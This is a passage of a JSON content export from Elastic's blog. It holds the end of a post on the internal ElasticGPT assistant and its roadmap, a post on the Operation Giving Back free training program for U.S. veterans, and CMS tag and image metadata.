responses, they are taking action to update or inform content owners. This organically improves our knowledge base, allowing us to use more updated information and making ElasticGPT more reliable.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What's next?","_metadata":{"uid":"csf67cd3487985ae5e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs we evaluate what’s next on our generative AI roadmap, specifically for ElasticGPT, we are thinking about it in the following dimensions:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eExpanding our knowledge base: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re looking to add incremental data sources to our knowledge base to provide access to a wider range of information.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScaling with a managed API service:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Building on our approach of a “central landing point\u003c/span\u003e\u003cspan style='color:rgb(19, 115, 51);font-size: 12pt;'\u003e,” \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ewe want to make it easier for our business groups to get started with generative AI. We’re developing a managed API service that teams can use to experiment in this space.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBuilding function-specific experiences: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWe plan to add specialized internal models to support function-specific use cases like in finance and legal with\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e different models using our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/inference-apis.html#:~:text=The%20inference%20APIs%20enable%20you%20to%20create%20inference%20endpoints%20and,or%20HuggingFace%20%2D%20as%20a%20service.\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic inference APIs\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e. This allows access to fine-tuned models for specific functions and out-of-the-box options, ensuring flexibility and precision for diverse business needs.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIncorporating automation: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eWe plan to see how we can incorporate agentic workflow automation for manual and routine tasks with predefined goals.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Embrace generative AI in your workflows","_metadata":{"uid":"csc236bfc4ba991f19"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThinking about building a generative AI tool for your workplace? A successful release requires planning and preparation. Before you begin your build, your organization should define a set of guidelines and frameworks around how and where it's safe to use generative AI tools. These guidelines outline important principles like ensuring the protection of sensitive data as well as considering aspects like the copyright of the created material.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenerative AI tools can be powerful assets, but they also bring a new set of risks that should be considered. Establishing your guidelines, data strategy, and frameworks upfront will help you navigate discussions around what you will be doing as well as what you will not be doing. In other words, you’ll be able to define what capabilities and data sources will be in the scope of your build(s) and how those outputs should be used.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGetting started with Elastic’s generative AI capabilities is easy using our \u003c/span\u003e\u003ca href=\"https://www.elastic.co/demo-gallery/ai-playground\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI Playground\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. You can unlock powerful generative AI capabilities using LLMs with a \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration?onboarding_token=playground\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efree 14-day trial\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Test out ingesting your data, build a proof of concept, and kick the tires on Elastic's machine learning and RAG capabilities. Deploy any data in any cloud — or multiple clouds — in real time, at scale.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDive deeper into \u003c/span\u003e\u003ca href=\"https://www.elastic.co/portfolio/operationalizing-generative-ai-strategic-guide\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehow to operationalize generative AI at your organization\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e or get started in the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/demo-gallery/ai-playground\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI Playground\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5d2c3916491f08d7"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csfd489308d6fabc6d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9217fa0d9120d2c3"}}}],"publish_date":"2024-12-04","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltdd4b5182721ccd42","ACL":{},"created_at":"2023-11-06T20:38:13.883Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"digital-experience","label_l10n":"Digital experience","tags":[],"title":"Digital experience","updated_at":"2023-11-06T20:38:13.883Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.180Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltedaba1c436cb0ded","ACL":{},"created_at":"2023-11-06T20:40:47.717Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"information-retrieval","label_l10n":"Information retrieval","tags":[],"title":"Information retrieval","updated_at":"2023-11-06T20:40:47.717Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:37.018Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","title":"Knowledge base search","label_l10n":"Knowledge base search","keyword":"knowledge-base-search","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt2c020c0c24ae64ef","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:41:47.026Z","updated_at":"2023-11-06T20:41:47.026Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:49.958Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"title":"Alerting","label_l10n":"Alerting","keyword":"alerting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltd8e03b8972ecf817","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:20.375Z","updated_at":"2020-06-17T03:38:20.375Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:20.374Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-06T00:49:19.650Z","user":"blt3044324473ef223b70bc674c"}},{"title":"DevOps","label_l10n":"DevOps","keyword":"devops","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltd2296d539450bf20","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T22:34:41.888Z","updated_at":"2021-12-16T22:34:41.888Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.169Z","user":"blt3044324473ef223b70bc674c"}},{"title":"Ingesting","label_l10n":"Ingesting","keyword":"ingesting","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt886805f7b26ef356","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:57.513Z","updated_at":"2020-06-17T03:37:57.513Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:57.513Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-29T17:20:06.688Z","user":"bltea6cbb86fea188be"}},{"_content_type_uid":"tags_topic","title":"Natural Language Processing (NLP)","label_l10n":"Natural Language Processing (NLP)","keyword":"natural-language-processing","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt97696fc6e9921c30","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:43:16.119Z","updated_at":"2023-11-06T20:43:16.119Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:23:24.704Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt5ebb3c17304b01bc","ACL":{},"created_at":"2023-11-06T20:47:38.117Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"privacy-first-ai","label_l10n":"Privacy-first AI","tags":[],"title":"Privacy-first AI","updated_at":"2023-11-06T20:47:38.117Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:58.404Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blte6358c0a4368f192","ACL":{},"created_at":"2023-11-06T20:39:12.952Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"end-user-experience","label_l10n":"End user experience","tags":[],"title":"End user experience","updated_at":"2023-11-06T20:39:12.952Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:48.382Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt4607298d4fd82c81","ACL":{},"created_at":"2020-06-17T03:31:33.256Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"workplace-search","label_l10n":"Workplace search","tags":[],"title":"Workplace search","updated_at":"2020-07-06T22:19:56.394Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:53.167Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt98fd95c432edcc83","_version":1,"title":"AI-ops-1920x1080-v2.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-04T15:01:36.969Z","updated_at":"2024-12-04T15:01:36.969Z","content_type":"image/jpeg","file_size":"64036","filename":"AI-ops-1920x1080-v2.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-04T16:19:59.774Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt98fd95c432edcc83/67506ed056ed54f39e12e1dc/AI-ops-1920x1080-v2.jpg"},"title":"ElasticGPT: Empowering our workforce with generative AI","title_l10n":"ElasticGPT: Empowering our workforce with generative AI","updated_at":"2024-12-04T16:19:49.479Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elasticgpt-generative-ai","publish_details":{"time":"2024-12-04T16:19:59.094Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfe845024cb92b104","_version":14,"locale":"en-us","ACL":{},"abstract_l10n":"Learn about how Elastic is giving back to America's heroes by providing access to a customized free training program, career support, and resources and a special place in our community to network build connections.","author":["bltf0d611e5d0023d98"],"category":["bltc253e0851420b088"],"created_at":"2022-08-09T14:44:27.435Z","created_by":"blt36060ca1dddf191e","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd2437a7f396284eb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eLaunched in September 2021, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/veterans\"\u003e\u003cspan style='font-size: 11pt;'\u003eOperation Giving Back\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e provides all U.S. veterans and active duty military personnel with access to Elastic training to help them grow and diversify their technical skill set.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eOperation Giving Back is about Elastic saying thank you to all military personnel by providing a leg up when it comes to technical skills development.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7b42650a3454bcf4"}}},{"quotes":{"quote_l10n":"Veterans who are considering transitioning into the dynamic, exciting career path of tech, should consider the free training on Elastic products. This valuable training offered by Elastic is a great springboard to entering tech where you can work from anywhere and move your career in the direction of your dreams.","_metadata":{"uid":"cs58bc0a75f776b60a"},"quote_author_l10n":"Hector Perez, Senior Director CRM Applications - Milastician ERG Executive Chair and U.S. Air Force Veteran","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9315632c64d0d758"},"header_style":"H2","paragraph_l10n":"\u003ch2\u003eCustomize your training experience\u003c/h2\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003eDesigned to support individuals looking to develop their Elastic skills in a variety of areas, participants in the program have access to a customized training program that includes the following courses:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 11pt;\"\u003eData Analysis with Kibana\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs289c8921a7433d16"}}},{"quotes":{"quote_l10n":"Elastic products provide the means to store, secure, access, and make actionable any data regardless of size, location, or complexity. Veterans interested in continuing to work at the ‘Tip of the Spear’ of the world’s fastest growing commodity should take advantage of the free training Elastic offers.","_metadata":{"uid":"csfe6826ade52e7c0c"},"quote_author_l10n":"Gordon McDonald, Sr. Manager, Sales Strategy \u0026 Finance - Milastician ERG Recruiting co-chair and U.S. Navy Veteran","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csafcbc870a47e923e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eParticipants can choose to complete all courses or identify a select few that are most beneficial to their personal and professional growth. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/veterans\"\u003e\u003cspan style='font-size: 11pt;'\u003eSign up to begin your free training program today!\u0026nbsp;\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003ch2\u003eDon’t just take our word for it\u0026nbsp;\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eWith over 600 active participants, Operation Giving Back continues to grow as the demand for advanced technical skill sets increases in a variety of industries. One participant, Tanner Greeb, of Cyber Advanced Analytics, completed the program because it was essential to his work with observability engineering. When asked about what impact the training had on his professional and personal goals, he shared the following:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003e\u003cem\u003e“Personally, it made the giant tool of Elastic feel a lot more user friendly. Professionally, I feel comfortable enough that I can write signatures, tune, and train much more effectively now… It put me on a fast track to understand how to utilize Elastic's large knowledge base more effectively.”\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eGreeb is just one of the many success stories associated with this program and is an example of how Operation Giving Back can impact the career trajectory of those looking to advance in their current role or break into a new field.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003ch2\u003eMore than just a training program\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eElastic continues to expand our support for the military community. We believe it’s not just about the free training, but also about providing the necessary resources, networking opportunities, and career support essential to achieving long-term success. Below are just a few of the resources and initiatives available to support veterans and active duty military:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://skillbridge.osd.mil/\"\u003e\u003cspan style='font-size: 11pt;'\u003eSkillbridge\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.hiringourheroes.org/\"\u003e\u003cspan style='font-size: 11pt;'\u003eHiring Our Heroes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.va.gov/vetsinworkplace/docs/em_fullVetResources.asp\"\u003e\u003cspan style='font-size: 11pt;'\u003eVeterans Employment Toolkit\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.military.com/veteran-jobs/career-advice/28-valuable-free-resources-veterans-re-entering-workforce.html\"\u003e\u003cspan style='font-size: 11pt;'\u003e28 Free Resources For Veterans Re-Entering the Workforce\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eThere’s never a bad time to consider your transition plan or to start building skills that will help you transition smoothly from military to civilian life.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs3b709fa8e829f55a"}}},{"quotes":{"quote_l10n":"When my husband left the military, we didn’t have a plan. It took over a year to find a suitable position for him in the state we wished to reside in and complete the necessary training to do that job. It was a very challenging year for us and made us question the decision to leave the military. I wish we had known more about transition resources available to my husband at that time.","_metadata":{"uid":"cs76b3e04c90ffff3a"},"quote_author_l10n":"Cami Lewis, Global Security Lead - Community, Milastician ERG Community co-chair, former U.S. Navy spouse","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf15ea4dc5cbd2671"},"header_style":"H2","paragraph_l10n":"\u003ch2\u003eJoin our community\u003c/h2\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eThe Elastic Community is excited to welcome you to connect with users and advocates around the world. Whether it's finding the support you need to complete a course or solve a problem using Elastic, connecting with fellow users in your area, or learning more about Elastic at a local meetup, we are here for you!\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://discuss.elastic.co/\"\u003e\u003cspan style='font-size: 11pt;'\u003eAsk a question\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e on our Discuss forum and get the support you need\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://ela.st/slack\"\u003e\u003cspan style='font-size: 11pt;'\u003eConnect with the community\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e on Slack and join the #veterans channel\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/community/contributor\"\u003e\u003cspan style='font-size: 11pt;'\u003eBecome a Contributor\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://community.elastic.co/\"\u003e\u003cspan style='font-size: 11pt;'\u003eAttend a meetup\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cbr/\u003e\u003cspan style='font-size: 11pt;'\u003e\u003cstrong\u003eReady to get started? \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/veterans\"\u003e\u003cspan style='font-size: 11pt;'\u003e\u003cstrong\u003eSign up today!\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs908bd8555e427138"}}}],"publish_date":"2022-08-09","sanity_migration_complete":false,"seo":{"noindex":false,"canonical_tag":"","seo_description_l10n":"Learn about how Elastic is giving back to America's heroes by providing access to a customized free training program, career support, and resources and a special place in our community to network build connections.","seo_image":{"uid":"blt392a914d30b4afd5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-08-22T21:07:21.681Z","updated_at":"2022-08-22T21:07:21.681Z","content_type":"image/png","file_size":"55791","filename":"thumb-veterans-dog-tags.png","title":"thumb-veterans-dog-tags.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-22T21:07:39.628Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt392a914d30b4afd5/6303f009c2bcbf7e72326aa5/thumb-veterans-dog-tags.png"},"seo_title_l10n":"Supporting U.S. veteran heroes through Operation Giving Back"},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"blt6d563296d3ba4a70","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[{"_version":1,"locale":"en-us","uid":"blt3185b1f0e9eed8d1","ACL":{},"created_at":"2021-09-20T22:40:25.614Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"public-sector","label_l10n":"Public Sector","tags":[],"title":"Public Sector","updated_at":"2021-09-20T22:40:25.614Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.530Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt392a914d30b4afd5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-08-22T21:07:21.681Z","updated_at":"2022-08-22T21:07:21.681Z","content_type":"image/png","file_size":"55791","filename":"thumb-veterans-dog-tags.png","title":"thumb-veterans-dog-tags.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-22T21:07:39.628Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt392a914d30b4afd5/6303f009c2bcbf7e72326aa5/thumb-veterans-dog-tags.png"},"title":"Supporting U.S. Veteran heroes through Operation Giving Back","title_l10n":"Supporting U.S. Veteran heroes through Operation Giving Back","updated_at":"2024-12-04T05:52:27.306Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/supporting-us-veteran-heroes-through-operation-giving-back","publish_details":{"time":"2024-12-04T05:52:33.317Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt858d3b57935d4bc0","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"Our 2023 Sustainability Report wraps another exciting year of progress at Elastic, 